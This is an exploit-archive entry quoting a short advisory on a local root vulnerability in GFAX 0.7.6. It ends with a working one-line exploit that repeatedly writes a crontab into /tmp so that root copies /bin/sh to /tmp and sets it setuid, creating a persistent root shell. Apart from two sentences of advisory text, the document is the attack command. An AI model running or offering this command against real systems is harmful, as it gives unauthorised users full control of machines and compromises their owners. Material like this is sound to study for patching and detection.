exploit-db-mirror/platforms/linux/local/30280.txt

source: http://www.securityfocus.com/bid/24780/info

GFAX is prone to a vulnerability that lets local attackers execute arbitrary commands with superuser privileges. Successful attacks will result in the complete compromise of affected computers.

GFAX 0.7.6 is vulnerable; other versions may also be affected. 

while true; do echo "*/1 * * * * root /bin/cp /bin/sh /tmp && chmod 4755 /tmp/sh" > /tmp/crontab; done